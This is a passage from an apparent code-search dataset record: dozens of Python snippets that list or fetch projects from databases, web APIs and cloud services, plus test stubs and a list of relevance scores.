self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n 
.where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def get_projects(cls):\n projects = []\n for project in Project.select():\n project_dict = {\n \"id\": project.id,\n \"title\": project.title,\n \"link\": project.link,\n \"description\": project.description\n }\n projects.append(project_dict)\n return projects", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def all(cls):\r\n projects_url = 'https://www.pivotaltracker.com/services/v3/projects'\r\n response = _perform_pivotal_get(projects_url)\r\n\r\n root = ET.fromstring(response.text)\r\n if root is not None:\r\n return [Project.from_node(project_node) for project_node in root]", "def get_projects(self, team_id):\n endpoint = '/teams/{}/projects'.format(team_id)\n return self._api_call('get', endpoint)", "def get_projects(self):\n projects = []\n for project in self.server.projects:\n projects.append({'id': utils.slugify(project),\n 'name': project})\n response.content_type = 'application/json'\n return json.dumps(projects)", "def projects(self):\r\n return p.Projects(self)", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def get_project_list(token):\n session = requests.Session()\n session.headers.update({'Authorization': f'Token {token}'})\n url = get_project_list_url()\n r = session.get(url=url)\n return r", "def test_get_projects(client, session, models, tokens):\n response = client.get(\n \"/projects\", headers={\"Authorization\": f\"Bearer {tokens['read']}\"}\n )\n assert response.status_code == 200\n assert len(response.json) > 0", "def do_project_list(cs, args):\n _, projects = cs.projects.list()\n fields = [\n 'project_id',\n 'name',\n 'owner_id',\n 'current_user_role_id',\n 'repo_count',\n 'creation_time',\n 'public',\n ]\n utils.print_list(projects, fields, formatters={}, sortby=args.sortby)", "def getProjects(self):\n\n return self.__projects", "def get_projects(self):\n session = self.session_factory()\n results = [row.project for row in session.query(PipelineRun.project.distinct().label('project')).all()]\n session.close()\n return results", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_projects(self):\n if not self.validate():\n raise SettingCustomVisionAccessFailed\n return self.get_trainer_obj().get_projects()", "def test_list_project_request(self):\n pass", "def get_projects_data():\n wcscanner_path = context.__BASE_PATH__ + '/.wcscanner'\n\n data = []\n for project in 
os.listdir(wcscanner_path):\n if (os.path.isdir(os.path.join(wcscanner_path, project))):\n update_project_data(project)\n project_path = '{}/{}'.format(wcscanner_path, project)\n f = open('{}/.project'.format(project_path), 'r')\n data.append(json.load(f))\n f.close()\n return data", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def get_projects(self, page_size, page, sort_direction, sort_conditions):\n request_url = self.api_base_url + \"projects?\" + \"pageSize=\" + str(page_size) + \"&page=\" + str(page) + \"&sortDirection=\" + sort_direction + \"&sortConditions=\" + sort_conditions\n headers = {\"Accept\": \"application/JSON\"}\n response = Util.get_api_call(request_url, headers)\n return response.json()", "def project_list(cursor):\n query = \"SELECT * FROM projects\"\n try:\n cursor.execute(query, {},)\n except Exception as e:\n on_error(e)\n else:\n projects = cursor.fetchall()\n raise Return((projects, None))", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def get(self):\n try:\n user = None\n user_id = token_auth.current_user()\n if user_id:\n user = UserService.get_user_by_id(user_id)\n search_dto = self.setup_search_dto()\n results_dto = ProjectSearchService.search_projects(search_dto, user)\n return results_dto.to_primitive(), 200\n except NotFound:\n return {\"mapResults\": {}, \"results\": []}, 200\n except (KeyError, ValueError) as e:\n error_msg = f\"Projects GET - {str(e)}\"\n return {\"Error\": error_msg}, 400", "def get_projects():\n data = sql.list_projects()\n names = [(d['id'], d['name']) for d in data]\n return names", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def get_all_projects():\n return jsonify(admin.get_all_projects(current_app.scoped_session()))", "def get_projects(self, refresh=False):\n if refresh:\n self._projects_lookup = self.get_project_lookup()\n\n return self._projects_lookup.keys()", "def GetProject(self):\n errors = []\n objects = list(request_helper.MakeRequests(\n requests=[(self.compute.projects,\n 'Get',\n self.messages.ComputeProjectsGetRequest(\n project=properties.VALUES.core.project.Get(\n required=True),\n ))],\n http=self.http,\n batch_url=self.batch_url,\n errors=errors,\n custom_get_requests=None))\n if errors:\n utils.RaiseToolException(\n errors,\n error_message='Could not fetch 
project resource:')\n return objects[0]", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if len(parsing.get_project_label(p))]", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n {\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def get_projects(self, source=\"all\"):\n self.projects = []\n self._project_indices_by_id = {}\n self._project_indices_by_name = {}\n\n if self.hub_type == self.NAMESPACES[\"a.\"]:\n if not self.auth.three_legged:\n self.logger.warning(\n \"Failed to get projects. '{}' hubs only supports 3-legged access token.\".format( # noqa:E501\n self.NAMESPACES[\"a.\"]\n )\n )\n else:\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n elif self.hub_type == self.NAMESPACES[\"b.\"]:\n\n if source.lower() in (\"all\", \"docs\"):\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n if (\n source.lower() in (\"all\", \"admin\")\n and not self.auth.three_legged\n ):\n\n for project in self.api.hq.get_projects():\n if project[\"id\"] in self._project_indices_by_id:\n self.projects[\n self._project_indices_by_id[project[\"id\"]]\n ].data = project\n else:\n self.projects.append(\n Project(\n project[\"name\"],\n project[\"id\"],\n data=project,\n app=self,\n )\n )\n self._project_indices_by_id[project[\"id\"]] = (\n len(self.projects) - 1\n )\n\n self._project_indices_by_name[project[\"name\"]] = (\n len(self.projects) - 1\n )\n\n elif source.lower() in (\"all\", \"admin\"):\n self.logger.debug(\n \"Failed to get projects. 
The BIM 360 API only supports 2-legged access tokens\" # noqa:E501\n )", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def list_projects(self) -> List['RadsProject']:\n ret = []\n base = self.fspath(\"projects\")\n for name in os.listdir(base):\n if os.path.isdir(f\"{base}/{name}/releases\"):\n ret.append(RadsProject(self, name))\n return ret", "def get_projects(session):\n cursuses = [1, 21] # cursus ids from which to get the projects\n project_names = []\n\n for cursus in cursuses:\n # Get all the projects from 1 cursus, very slow process because projects endpoint contains\n # a lot of information\n projects = get_all_pages(session, f'/cursus/{cursus}/projects', 100, {'filter[exam]': False})\n for project in projects:\n # Create dictionary containing project id and project name ans set in bigger dict\n project_names.append({'id': project['id'], 'name': project['name']})\n\n return project_names", "def repository_projects(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_projects\", host, owner, repo)", "def test_list_project(self):\n pass", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def find_projects(self, project_name: Optional[str] = None) -> List[Project]:\n with self.table_access_condition:\n conn = self._get_connection()\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT * from projects\n WHERE (?1 IS NULL OR project_name = ?1)\n \"\"\",\n (project_name,),\n )\n rows = c.fetchall()\n return [\n Project(self, str(r[\"project_id\"]), row=r, _used_new_call=True)\n for r in rows\n ]", "def _page_projects(self):\n return self._open(self.app.page_projects)", "def BuildProjectsList(self, projects):\n return ProjectsMessage(\n projects=[ProjectsMessage.Project(projectId=project)\n for project in projects]\n )", "def projects(self):\n sql = \"\"\"SELECT project\n FROM barcodes.sample\n LEFT JOIN barcodes.project_sample_sets USING (sample_set_id)\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n UNION\n SELECT project\n FROM barcodes.project_samples\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n \"\"\"\n with pm.sql.TRN:\n pm.sql.TRN.add(sql, [self.id, self.id])\n projects = pm.sql.TRN.execute_fetchflatten()\n return None if not projects else projects", "def test_projects_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_project_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project',\n json=expected_response,\n status=200\n )\n resp = requests.get(f'{os.environ[\"AIVEN_API_URL\"]}/v1/project')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n assert responses.calls[0].request.url == f'{os.environ[\"AIVEN_API_URL\"]}/v1/project'\n assert \"MY-PROJECT-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def do_projects(self, arg):\n args 
= shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def projects_from_cli(args):\n description = ('Determine if a set of project dependencies will work with '\n 'Python 3')\n parser = argparse.ArgumentParser(description=description)\n req_help = ('path to a pkg_resources requirements file '\n '(e.g. requirements.txt)')\n parser.add_argument('--requirements', '-r', nargs='?',\n help=req_help)\n meta_help = 'path to a PEP 426 metadata file (e.g. PKG-INFO, pydist.json)'\n parser.add_argument('--metadata', '-m', nargs='?',\n help=meta_help)\n parser.add_argument('--projects', '-p', type=lambda arg: arg.split(','),\n nargs='?', help='a comma-separated list of projects')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='verbose output')\n parsed = parser.parse_args(args)\n\n projects = []\n if parsed.verbose:\n logging.getLogger().setLevel(logging.INFO)\n if parsed.requirements:\n projects.extend(projects_from_requirements(parsed.requirements))\n if parsed.metadata:\n with open(parsed.metadata) as file:\n projects.extend(projects_from_metadata(file.read()))\n if parsed.projects:\n projects.extend(parsed.projects)\n\n return projects", "def _ExpectListProjects(self, projects):\n self.mock_projects_client.projects.List.Expect(\n self.projects_messages.CloudresourcemanagerProjectsListRequest(\n filter='lifecycleState:ACTIVE'),\n self.projects_messages.ListProjectsResponse(\n projects=[\n self.projects_messages.Project(\n projectId=p, name='name') for p in projects]))", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n 
Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def list(self, *args, **kwargs):\n projects = Project.objects.all()\n return self.list_by(projects, self.serializer_class)", "def getSubProjects(self):\n logger.debug(\"Func: getSubProjects\")\n\n return self._subProjectsList", "def projects(self):\n campaigns = self.campaigns.all()\n return Project.published_objects.filter(campaigns__in=campaigns)", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def get_create_projects(target, proposal_ref, proposal_code='lb'):\n\n # Note that in the loader this is based on information in the PROPOSALS and VISITS files\n # TODO Multiple Visits can be defined in a file apparently - future improvement.\n # TODO NB LIne above in delete_users - redundant if using ISPYB??.\n # For the online loader it comes from the proposal_ref\n\n projects = []\n # The first word is the ISPY proposal/visit name that is used as the title of the project.\n # It can be set to OPEN in which case there are no users.\n visit = proposal_ref.split()[0]\n # If the visit is not prefixed by the proposal code\n # (typically a 2-letter sequence like \"lb\") then prefix it.\n if visit[0].isdigit():\n visit = f\"{proposal_code}{visit}\"\n project = Project.objects.get_or_create(title=visit)[0]\n projects.append(project)\n\n # If not open then delete users for the project and re-add them based on supplied fed-ids.\n delete_users(project)\n\n # Update project_id on target.\n target.project_id.add(project)\n\n # Remaining words in proposal_ref (if any) must be fedid's which are used to find users information.\n num_users = 0\n for fedid in proposal_ref.split()[1:]:\n user = User.objects.get_or_create(username=fedid, password=\"\")[0]\n project.user_id.add(user)\n num_users += 1\n if num_users == 0:\n project.open_to_public = True\n\n target.upload_progess = 10.00\n target.save()\n\n return projects", "def get_projects_route():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n if post_data is not None:\n add_project(post_data)\n response_object['message'] = 'Project added!'\n else:\n response_object['projects'] = get_projects()\n return jsonify(response_object)", "def get_project_list(config):\n eggs_dir = config.get('eggs_dir', 'eggs')\n if os.path.exists(eggs_dir):\n projects = os.listdir(eggs_dir)\n else:\n projects = []\n try:\n projects += [x[0] for x in config.cp.items('settings')]\n except NoSectionError:\n pass\n return projects", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n 
output_json_data(data)", "def get_group_projects(groupname):\n values = admin.get_group_projects(current_app.scoped_session(), groupname)\n return jsonify({\"projects\": values})", "def get_client_projects(self, client=None):\n if type(client) is Client:\n return [p for p in self.project_list if client.client_id == p.client_id]", "def get(self, request):\n projects = Project.objects.all()\n serializer = ProjectSerializer(projects, many=True)\n return JsonResponse({'projects': [data['name'] for data in serializer.data]})", "async def get_project_info(project_urls):\n project_info = []\n for url in project_urls:\n soup = await get_page(url)\n about = soup.find_all(\"p\")\n title = soup.find(\"h3\").text\n student = about[0].text.splitlines()[2].strip()\n details = about[1].text\n name = about[0].find(\"a\").text\n project_info.append({'Organization': name, 'title': title,\n 'student': student, 'details': details,\n 'link': url})\n\n return project_info", "def getProjectsForOrgs(org_keys, limit=1000):\n q = getProjectsQueryForOrgs(org_keys)\n return q.fetch(limit)", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n self.assertTrue(second_page_project in second_page_results)", "def list_namespaced_project(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_project\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/projects'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n 
body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ProjectList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def list(self, request):\n projects = Project.objects.all()\n\n serializer = ProjectSerializer(projects, many=True, context={'request': request}) # convert to json\n return Response(serializer.data)", "def test_get_project(self):\n pass" ]
[ "0.8439259", "0.8330137", "0.81635183", "0.790544", "0.7656669", "0.7634909", "0.7559611", "0.7557729", "0.7551785", "0.7523433", "0.7494402", "0.7446309", "0.74364996", "0.7427242", "0.73962003", "0.7385047", "0.73531884", "0.7350818", "0.73503566", "0.7344059", "0.7321423", "0.7311092", "0.73055935", "0.7295584", "0.7294882", "0.7290948", "0.72558933", "0.7221671", "0.72190756", "0.719097", "0.7174291", "0.71686316", "0.71590555", "0.7155045", "0.7155045", "0.7121004", "0.71115196", "0.7109773", "0.71041244", "0.7068838", "0.7054094", "0.70132554", "0.6994621", "0.69943553", "0.69558734", "0.6927423", "0.69193584", "0.69176495", "0.6908577", "0.68975335", "0.6877014", "0.68387467", "0.6833768", "0.682744", "0.6807972", "0.6786737", "0.67476255", "0.6736512", "0.6735734", "0.67298216", "0.6716762", "0.67050457", "0.6697824", "0.66905236", "0.66652894", "0.6663583", "0.6646426", "0.6640717", "0.66354424", "0.6624113", "0.66241014", "0.66200215", "0.65839833", "0.658229", "0.65745354", "0.65658605", "0.6561446", "0.6554841", "0.653005", "0.6516381", "0.65155864", "0.6506242", "0.6504421", "0.6492944", "0.6491935", "0.64887846", "0.6452931", "0.6444837", "0.6425635", "0.64224404", "0.6404767", "0.6395213", "0.6381957", "0.6373191", "0.63585657", "0.63572675", "0.6340091", "0.6311536", "0.6301373", "0.6299453" ]
0.862502
0
fetcher.get_projects() should be able to filter on project.
def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):
    projects = fc.get_projects(test_project_name)
    assert isinstance(projects, list)
    assert len(projects) == 1
    assert projects[0].name == test_project_name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_projects(self):\n pass", "def test_list_project_request(self):\n pass", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def get_projects():\n return Project.query.all()", "def _get_filtered_projects(filters):\n projects_itr = (projects_lib.get_filtered(f) for f in filters)\n return itertools.chain.from_iterable(projects_itr)", "def test_list_project(self):\n pass", "def filter_projects():\n with open('../results/01.crawling/01.project_ci_services.json', 'r') as infile:\n projects = json.load(infile)\n tr_projects = []\n for project, value in projects.items():\n if \"GitHub\" in value or \"Travis\" in value:\n tr_projects.append(project)\n return tr_projects", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def test_get_project_list_with_tag_filter(self):\n # Add test projects.\n tag = 'tag1'\n projects_with_tag = [\n add_project(title='1', description='1', tags=[tag]),\n add_project(title='2', description='2', tags=[tag]),\n ]\n project_without_tag = add_project(title='3', description='3', tags=[])\n\n result = get_project_list(tag=tag)\n result_projects = result['projects'].object_list\n\n # Make sure only projects with tag are retrieved.\n for project_with_tag in projects_with_tag:\n self.assertTrue(project_with_tag in result_projects)\n self.assertFalse(project_without_tag in result_projects)\n self.assertEqual(len(result_projects), len(projects_with_tag))\n self.assertTrue(result['filtered'])\n self.assertEqual(result['tag'], tag)", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def _get_projects(filters):\n # First order the objects, so separate that out\n orders_query = [o for o in filters if o['type']=='order']\n # Filter objects next, so separate those out\n filters_query = [f for f in filters if f['type']=='filter']\n\n projects = Project.objects.all()\n # We need a dictonary to pass to Django's filter function\n query_dict = {}\n # Order 
the projects based on the ordering queries\n for orders in orders_query:\n projects = projects.order_by(orders['property'])\n # create the dictonary based on the filtering queries\n for filters in filters_query:\n # First, if we want to filter by user, find the user\n if filters['property'] =='user':\n try:\n user_p = UserProfile.objects.get(email=filters['value'])\n query_dict[filters['property']] = user_p\n except UserProfile.DoesNotExist:\n raise Http404(\"User does not exist\")\n # Second, if the filter is by tags, change the query phrase\n # to 'tags__tag_name' - this is because tags is a ManyToManyField\n # and we want to search by the tag_name property of Tag objects\n elif filters['property'] == 'tags':\n filters['property'] = 'tags__tag_name'\n query_dict[filters['property']] = filters['value']\n else:\n # Make a dictionary, property: value, and you can pass it to filter fn\n query_dict[filters['property']] = filters['value']\n projects = projects.filter(**query_dict)\n return projects", "def query_projects(request):\n try:\n filters = request.data\n except AttributeError:\n filters = FILTER\n projects = _get_projects(filters)\n projects_as_json = serializers.serialize('json', projects)\n return HttpResponse(json.dumps(projects_as_json), content_type='json')", "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def test_get_current(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_current()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"derrida\"] in qs\n assert projects[\"pliny\"] in qs\n assert projects[\"ocampo\"] in qs\n assert projects[\"slavic\"] not in qs", "def test_get_projects_expanded(self):\n pass", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def get_projects(self):\n return conf.projects", "def projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user)", "def projects(self):\r\n return p.Projects(self)", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n 
self.assertTrue(second_page_project in second_page_results)", "def open_projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user, open=True)", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, 